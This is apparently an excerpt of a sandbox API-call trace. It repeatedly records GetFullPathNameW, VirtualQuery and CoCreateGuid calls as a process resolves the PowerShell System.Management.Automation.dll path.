	[0284.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.672] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.673] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.674] VirtualQuery (in: lpAddress=0x20b7d0, lpBuffer=0x20c690, dwLength=0x30 | out: lpBuffer=0x20c690*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.674] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.674] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.674] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.674] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.674] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.675] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.675] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.675] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.675] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.675] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.675] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.675] VirtualQuery (in: lpAddress=0x20b400, lpBuffer=0x20c2c0, dwLength=0x30 | out: lpBuffer=0x20c2c0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.675] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.676] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.676] VirtualQuery (in: lpAddress=0x20b730, lpBuffer=0x20c5f0, dwLength=0x30 | out: lpBuffer=0x20c5f0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.676] VirtualQuery (in: lpAddress=0x20b7c0, lpBuffer=0x20c680, dwLength=0x30 | out: lpBuffer=0x20c680*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.676] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x88c0fb1d, Data2=0x122a, Data3=0x49f7, Data4=([0]=0x98, [1]=0xfc, [2]=0x54, [3]=0x1c, [4]=0x21, [5]=0x47, [6]=0x42, [7]=0x6))) returned 0x0
	[0285.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.677] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x1e2f8aa6, Data2=0x7ec1, Data3=0x433c, Data4=([0]=0xb6, [1]=0x36, [2]=0x73, [3]=0x54, [4]=0x20, [5]=0x63, [6]=0x99, [7]=0xc2))) returned 0x0
	[0285.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20bb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
